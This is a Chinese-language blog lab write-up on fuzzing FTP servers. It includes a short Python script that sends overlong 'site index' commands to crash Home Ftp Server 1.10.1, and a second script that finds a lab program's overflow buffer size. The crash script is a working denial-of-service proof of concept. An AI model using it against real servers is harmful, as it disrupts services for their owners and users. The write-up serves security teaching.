-
Notifications
You must be signed in to change notification settings - Fork 1
/
漏洞挖掘与模糊测试实验.html
662 lines (503 loc) · 48.7 KB
/
漏洞挖掘与模糊测试实验.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.2">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">
<script id="hexo-configurations">
var NexT = window.NexT || {};
var CONFIG = {"hostname":"leeyuxun.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":true,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"./public/search.xml"};
</script>
<meta name="description" content="实验目的 了解fuzz的基本原理; 通过FtpFuzz来fuzz easy ftp server的服务器,使服务器停止工作; 自己编写或修改Python脚本来自己编写FTP FUZZ简单工具,并用其来对Home Ftp Server进行Fuzz,使服务器停止工作,可以用OllyDbg附加查看异常。">
<meta property="og:type" content="article">
<meta property="og:title" content="漏洞挖掘与模糊测试实验">
<meta property="og:url" content="https://leeyuxun.github.io/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B8%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C.html">
<meta property="og:site_name" content="Leeyuxun の note">
<meta property="og:description" content="实验目的 了解fuzz的基本原理; 通过FtpFuzz来fuzz easy ftp server的服务器,使服务器停止工作; 自己编写或修改Python脚本来自己编写FTP FUZZ简单工具,并用其来对Home Ftp Server进行Fuzz,使服务器停止工作,可以用OllyDbg附加查看异常。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854306571.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854387309.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854408500.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854432527.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854595402.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854601231.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854607650.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854685778.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854760808.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854812857.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854830715.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854863418.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854960261.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855030266.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855066435.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855312803.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855329426.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855341850.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855374334.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855659005.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855664320.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855669129.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855729470.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855764316.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565856034118.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565856219819.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565856255135.png">
<meta property="article:published_time" content="2019-08-15T07:26:19.000Z">
<meta property="article:modified_time" content="2023-05-07T07:37:53.563Z">
<meta property="article:author" content="李钰璕">
<meta property="article:tag" content="漏洞挖掘">
<meta property="article:tag" content="模糊测试">
<meta property="article:tag" content="fuzz">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854306571.png">
<link rel="canonical" href="https://leeyuxun.github.io/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B8%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C.html">
<script id="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : false,
isPost : true,
lang : 'zh-CN'
};
</script>
<title>漏洞挖掘与模糊测试实验 | Leeyuxun の note</title>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-V3499K2XZY"></script>
<script>
if (CONFIG.hostname === location.hostname) {
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'G-V3499K2XZY');
}
</script>
<script>
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?4d72a66931dff6410b32974da2e3df61";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
</script>
<noscript>
<style>
.use-motion .brand,
.use-motion .menu-item,
.sidebar-inner,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle {
opacity: initial;
top: initial;
}
.use-motion .logo-line-before i { left: initial; }
.use-motion .logo-line-after i { right: initial; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage">
<div class="container use-motion">
<div class="headband"></div>
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="切换导航栏">
<span class="toggle-line toggle-line-first"></span>
<span class="toggle-line toggle-line-middle"></span>
<span class="toggle-line toggle-line-last"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<span class="logo-line-before"><i></i></span>
<h1 class="site-title">Leeyuxun の note</h1>
<span class="logo-line-after"><i></i></span>
</a>
<p class="site-subtitle" itemprop="description">BUPT | SCSS</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<nav class="site-nav">
<ul id="menu" class="main-menu menu">
<li class="menu-item menu-item-home">
<a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>
</li>
<li class="menu-item menu-item-tags">
<a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>
</li>
<li class="menu-item menu-item-categories">
<a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>
</li>
<li class="menu-item menu-item-archives">
<a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>
</li>
<li class="menu-item menu-item-links">
<a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>
</li>
<li class="menu-item menu-item-search">
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup">
<div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<input autocomplete="off" autocapitalize="off"
placeholder="搜索..." spellcheck="false"
type="search" class="search-input">
</div>
<span class="popup-btn-close">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div id="search-result">
<div id="no-result">
<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
</div>
</div>
</div>
</div>
</div>
</header>
<main class="main">
<div class="main-inner">
<div class="content-wrap">
<div class="content post posts-expand">
<article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
<link itemprop="mainEntityOfPage" href="https://leeyuxun.github.io/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E4%B8%8E%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95%E5%AE%9E%E9%AA%8C.html">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.png">
<meta itemprop="name" content="李钰璕">
<meta itemprop="description" content="安全学习笔记">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Leeyuxun の note">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
漏洞挖掘与模糊测试实验
</h1>
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">发表于</span>
<time title="创建时间:2019-08-15 15:26:19" itemprop="dateCreated datePublished" datetime="2019-08-15T15:26:19+08:00">2019-08-15</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar-check"></i>
</span>
<span class="post-meta-item-text">更新于</span>
<time title="修改时间:2023-05-07 15:37:53" itemprop="dateModified" datetime="2023-05-07T15:37:53+08:00">2023-05-07</time>
</span>
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-folder"></i>
</span>
<span class="post-meta-item-text">分类于</span>
<span itemprop="about" itemscope itemtype="http://schema.org/Thing">
<a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C/" itemprop="url" rel="index"><span itemprop="name">软件安全实验</span></a>
</span>
</span>
<span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
<span class="post-meta-item-icon">
<i class="fa fa-eye"></i>
</span>
<span class="post-meta-item-text">阅读次数:</span>
<span id="busuanzi_value_page_pv"></span>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h1 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h1><ol>
<li>了解<code>fuzz</code>的基本原理;</li>
<li>通过<code>FtpFuzz</code>来<code>fuzz easy ftp server</code>的服务器,使服务器停止工作;</li>
<li>自己编写或修改<code>Python</code>脚本来自己编写<code>FTP FUZZ</code>简单工具,并用其来对<code>Home Ftp Server</code>进行<code>Fuzz</code>,使服务器停止工作,可以用<code>OllyDbg</code>附加查看异常。 <span id="more"></span></li>
</ol>
<h1 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h1><table>
<thead>
<tr>
<th align="center">软件</th>
<th align="center">版本</th>
</tr>
</thead>
<tbody><tr>
<td align="center">服务器端</td>
<td align="center">Win 2000</td>
</tr>
<tr>
<td align="center">客户端</td>
<td align="center">Win 2000</td>
</tr>
<tr>
<td align="center"><code>Quick Easy Ftp Server</code></td>
<td align="center">3.1 Lite</td>
</tr>
<tr>
<td align="center"><code>Infigo FTPStress Fuzzer</code></td>
<td align="center">V1.0</td>
</tr>
<tr>
<td align="center"><code>Home Ftp Server</code></td>
<td align="center">1.10.1</td>
</tr>
</tbody></table>
<h1 id="通过FtpFuzz来fuzz-easy-ftp-server的服务器,使服务器停止工作"><a href="#通过FtpFuzz来fuzz-easy-ftp-server的服务器,使服务器停止工作" class="headerlink" title="通过FtpFuzz来fuzz easy ftp server的服务器,使服务器停止工作"></a>通过<code>FtpFuzz</code>来<code>fuzz easy ftp server</code>的服务器,使服务器停止工作</h1><ol>
<li><p>使用<code>Quick’n Easy FTP server</code>搭建服务器,开放匿名用户</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854306571.png" alt="1565854306571"></p>
</li>
<li><p>设置<code>FTP</code>的目录</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854387309.png" alt="1565854387309"></p>
</li>
<li><p>开放<code>Download</code>权限,并启动服务器</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854408500.png" alt="1565854408500"></p>
</li>
<li><p>打开<code>ftpfuzz</code>的<code>exe</code>文件,进行服务器的<code>FUZZ</code></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854432527.png" alt="1565854432527"></p>
</li>
<li><p>左下角下拉框选择<code>Deselect All</code>,然后在<code>USER</code>选项和<code>PASS</code>选项中的<code>Command Argument</code>中填入<code>anonymous</code>,在LIST选项中选中<code>fuzz this ftp command</code>选项</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854595402.png" alt="1565854595402"></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854601231.png" alt="1565854601231"></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854607650.png" alt="1565854607650"></p>
</li>
<li><p>点击<code>config</code>菜单,在<code>Fuzzing data</code>中设定要设置的脏数据</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854685778.png" alt="1565854685778"></p>
</li>
<li><p>设置<code>FTP</code>主机的<code>IP</code>地址,点击<code>start</code>开始<code>fuzz</code></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854760808.png" alt="1565854760808"></p>
</li>
<li><p>启动<code>fuzzer</code>后可以观察到相关的信息</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854812857.png" alt="1565854812857"></p>
</li>
<li><p>红字的部分说明了已经<code>fuzz</code>成功,<code>FTP</code>服务器因脏数据而崩溃</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854830715.png" alt="1565854830715"></p>
</li>
<li><p>打开<code>FTP</code>主机的情况,发现的确崩溃,<code>fuzz</code>生效</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854863418.png" alt="1565854863418"></p>
</li>
</ol>
<h1 id="编写或修改Python脚本来自己编写FTP-FUZZ简单工具,并用其来对Home-Ftp-Server进行Fuzz-使服务器停止工作"><a href="#编写或修改Python脚本来自己编写FTP-FUZZ简单工具,并用其来对Home-Ftp-Server进行Fuzz-使服务器停止工作" class="headerlink" title="编写或修改Python脚本来自己编写FTP FUZZ简单工具,并用其来对Home Ftp Server进行Fuzz,使服务器停止工作"></a>编写或修改<code>Python</code>脚本来自己编写<code>FTP FUZZ</code>简单工具,并用其来对<code>Home Ftp Server</code>进行<code>Fuzz</code>,使服务器停止工作</h1><ol>
<li><p>打开<code>Home FTP Server</code>程序,点击<code>New Member</code>创建新成员,填入相关信息:<code>User name: Levi ; Password: root</code></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565854960261.png" alt="1565854960261"></p>
</li>
<li><p>启动<code>Home FTP Server</code>,在<code>URL</code>中输入:<code>ftp://10.122.237.117/</code>,并使用用户名和密码登录后显示如下,说明服务器正常运行</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855030266.png" alt="1565855030266"></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855066435.png" alt="1565855066435"></p>
</li>
<li><p>编写<code>fuzz.py</code>文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> socket,sys</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">ftp</span>(<span class="params">ip,port,user,passwd</span>):</span><br><span class="line"> s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) //建立socket连接</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> connect=s.connect((ip,port)) //连接主机</span><br><span class="line"> <span class="built_in">print</span> <span class="string">'[+] Connected!'</span></span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">'[!] Connected failed!'</span></span><br><span class="line"> exit(<span class="number">0</span>)</span><br><span class="line"> <span class="built_in">print</span> s.recv(<span class="number">1024</span>)</span><br><span class="line"> s.send(<span class="string">'USER %s\r\n'</span>%user) //发送用户名</span><br><span class="line"> <span class="built_in">print</span> s.recv(<span class="number">1024</span>)</span><br><span class="line"> s.send(<span class="string">'PASS %s\r\n'</span>%passwd) //发送密码</span><br><span class="line"> <span class="built_in">print</span> s.recv(<span class="number">1024</span>)</span><br><span class="line"> <span class="built_in">print</span> <span class="string">"[+] Sending payload..."</span></span><br><span class="line"> s.send(<span class="string">'site index '</span>+<span class="string">'a'</span>*<span class="number">272</span>*<span class="number">1</span>+<span class="string">'\r\n'</span>) //发送脏数据</span><br><span class="line"> s.send(<span class="string">'site index '</span>+<span class="string">'a'</span>*<span class="number">272</span>*<span class="number">2</span>+<span class="string">'\r\n'</span>) //发送脏数据(发送一次无法实现服务器崩溃)</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="built_in">print</span> s.recv(<span class="number">1024</span>)</span><br><span class="line"> <span class="built_in">print</span> <span class="string">'failed'</span> //出现异常说明可能出现了漏洞</span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> <span class="built_in">print</span> <span class="string">'succeed'</span></span><br><span class="line"> s.close()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> ftp(<span class="string">'127.0.0.1'</span>,<span class="number">21</span>,<span class="string">'Levi'</span>,<span class="string">'root'</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure></li>
<li><p>运行<code>fuzz.py</code>脚本,查看运行结果,显示<code>failed</code>说明无法访问服务器,返回的数据是发送的脏数据</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855312803.png" alt="1565855312803"></p>
</li>
<li><p>查看服务器,发现服务器已经停止运行</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855329426.png" alt="1565855329426"></p>
</li>
<li><p>查看服务器日志,连续收到多次脏数据后直接退出</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855341850.png" alt="1565855341850"></p>
</li>
<li><p>将<code>HomeFtpServer.exe</code>放进<code>Ollydbg</code>中,重新执行<code>fuzz</code>程序,获得程序崩溃信息,跳转到<code>kernel32.77E99ED8</code>处时发生异常</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855374334.png" alt="1565855374334"></p>
</li>
</ol>
<h1 id="测试结论"><a href="#测试结论" class="headerlink" title="测试结论"></a>测试结论</h1><p> 使用现成的<code>fuzz</code>攻击程序对目标主机进行<code>fuzz</code>攻击,可以使得FTP服务器崩溃;通过编写的<code>fuzz</code>源代码,也可以通过连接目标主机并发送脏数据包实现<code>fuzz</code>攻击,达到让目标服务器崩溃的效果,通过<code>ollydbg</code>分析该过程时,只能找到程序崩溃的位置,并没有找到程序崩溃的原因,虽然理论上是重复插入了相同的数据导致<code>FTP</code>服务器异常。</p>
<h1 id="思考题"><a href="#思考题" class="headerlink" title="思考题"></a>思考题</h1><p>开发一个针对文件溢出的目标程序的<code>fuzz</code>程序,使目标程序崩溃。要求生成攻击测试文件并通过程序自动加载,并确定从哪个文件开始出现程序崩溃,给出被攻击缓冲区实际大小,并植入一个<code>shellcode</code>(功能不限)</p>
<ol>
<li><p>使用<code>IDA</code>打开程序,反汇编得到反汇编代码,分析反汇编代码,发现<code>overflow_exe.exe</code>实现的功能是读取<code>password.txt</code>中的内容,与实现设定的正确密码<code>1234567</code>进行对比,若相同则输出<code>incorrect password!</code>,不同则输出<code>Congratulation! You have passed the verification!</code></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855659005.png" alt="1565855659005"></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855664320.png" alt="1565855664320"></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855669129.png" alt="1565855669129"></p>
</li>
<li><p>运行程序,验证步骤一</p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855729470.png" alt="1565855729470"></p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565855764316.png" alt="1565855764316"></p>
</li>
<li><p>编写源代码,计算缓冲区大小</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">rpwd = <span class="string">"Congratulation! You have passed the verification!\n"</span></span><br><span class="line">wpwd = <span class="string">"incorrect password!\n"</span></span><br><span class="line"></span><br><span class="line">i = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> i < <span class="number">100</span>:</span><br><span class="line"> fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line"> fp.write(<span class="string">"aaaa"</span>*i*<span class="number">100</span>)</span><br><span class="line"> fp.close()</span><br><span class="line"> p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br><span class="line"> text = p.readlines()</span><br><span class="line"> string = <span class="string">""</span>.join(text)</span><br><span class="line"> <span class="keyword">if</span> string == rpwd <span class="keyword">or</span> string == wpwd:</span><br><span class="line"> i+=<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">"程序运行大约%d次后崩溃!"</span>%(i*<span class="number">4</span>*<span class="number">100</span>)</span><br><span class="line"></span><br><span class="line">j = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> j < <span class="number">100</span>:</span><br><span class="line"> fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line"> fp.write(<span class="string">"aaaa"</span>*(i-<span class="number">1</span>)*<span class="number">100</span>+<span class="string">"aaaa"</span>*j*<span class="number">10</span>)</span><br><span class="line"> fp.close()</span><br><span class="line"> p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br><span class="line"> text = p.readlines()</span><br><span class="line"> string = <span class="string">""</span>.join(text)</span><br><span class="line"> <span class="keyword">if</span> string == rpwd <span class="keyword">or</span> string == wpwd:</span><br><span class="line"> j+=<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">"程序运行大约%d次后崩溃!"</span>%((i-<span class="number">1</span>)*<span class="number">4</span>*<span class="number">100</span>+j*<span class="number">4</span>*<span class="number">10</span>)</span><br><span class="line"></span><br><span class="line">t = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> t < <span class="number">100</span>:</span><br><span class="line"> fp = <span class="built_in">open</span>(<span class="string">"password.txt"</span>,<span class="string">"w+"</span>)</span><br><span class="line"> fp.write(<span class="string">"aaaa"</span>*(i-<span class="number">1</span>)*<span class="number">100</span>+<span class="string">"aaaa"</span>*(j-<span class="number">1</span>)*<span class="number">10</span>+<span class="string">"a"</span>*t)</span><br><span class="line"> fp.close()</span><br><span class="line"> p = os.popen(<span class="string">"overflow_exe.exe"</span>)</span><br><span class="line"> text = p.readlines()</span><br><span class="line"> string = <span class="string">""</span>.join(text)</span><br><span class="line"> <span class="keyword">if</span> string == rpwd <span class="keyword">or</span> string == wpwd:</span><br><span class="line"> t+=<span class="number">1</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span> <span class="string">"程序运行%d次后崩溃!"</span>%((i-<span class="number">1</span>)*<span class="number">4</span>*<span class="number">100</span>+(j-<span class="number">1</span>)*<span class="number">4</span>*<span class="number">10</span>+t)</span><br></pre></td></tr></table></figure></li>
<li><p>运行脚本,得到缓冲区大小为<code>8197</code> </p>
<p><img src="https://raw.githubusercontent.com/Leeyuxun/pic-storage/main/img/1565856034118.png" alt="1565856034118"></p>
</li>
